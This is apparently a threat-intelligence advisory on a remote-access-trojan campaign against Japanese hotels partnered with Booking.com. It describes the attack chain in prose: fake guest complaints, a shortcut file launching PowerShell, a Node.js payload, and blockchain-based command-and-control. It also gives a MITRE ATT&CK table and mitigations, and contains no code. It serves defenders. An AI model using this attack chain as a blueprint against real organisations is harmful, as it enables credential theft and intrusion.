EXECUTIVE SUMMARY
An unidentified threat group is actively targeting the Japanese hospitality sector, specifically hotels partnered with Booking.com. This campaign employs a remote access trojan designed to establish a persistent foothold within corporate networks. Attackers aim to steal sensitive credentials and facilitate further compromise by disguising malicious emails as urgent guest complaints or review requests. By focusing on hotel employees, the actors seek to gain initial access through social engineering, ultimately aiming to exfiltrate valuable data and maintain long-term control over infected environments.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
An unidentified threat group is actively targeting the Japanese hospitality sector, specifically hotels partnered with Booking.com. This campaign employs a remote access trojan designed to establish a persistent foothold within corporate networks. Attackers aim to steal sensitive credentials and facilitate further compromise by disguising malicious emails as urgent guest complaints or review requests. By focusing on hotel employees, the actors seek to gain initial access through social engineering, ultimately aiming to exfiltrate valuable data and maintain long-term control over infected environments.[emaillocker id="1283"]
The attack chain begins with phishing emails that trick recipients into downloading a zip archive containing a disguised shortcut file. Executing this file triggers a PowerShell script that retrieves and runs a JavaScript payload using a legitimate Node.js framework. Once active, the malware queries a blockchain smart contract to locate the command-and-control server, ensuring the infrastructure remains resilient against takedowns. The malware maintains persistence through a keepalive loop, allowing operators to issue commands remotely and steal stored credentials without needing hardcoded server addresses.
This threat poses significant risks because using blockchain for command-and-control infrastructure makes blocking malicious domains extremely difficult for traditional security tools. The abuse of legitimate applications like Node.js helps the malware blend in with normal network traffic, evading standard detection methods. Organizations should restrict unnecessary access to blockchain platforms and closely monitor PowerShell activity. Additionally, implementing strict email filtering and training staff to recognize suspicious customer service inquiries can disrupt the initial infection vector before it reaches the endpoint.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Resource Development | T1583.001 | Acquire Infrastructure | Domains |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Command and Control | T1108 | Dead Drop Resolver | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
The following reports contain further technical details:
https://www.trendmicro.com/en_us/research/26/f/tonresolver.html
[/emaillocker]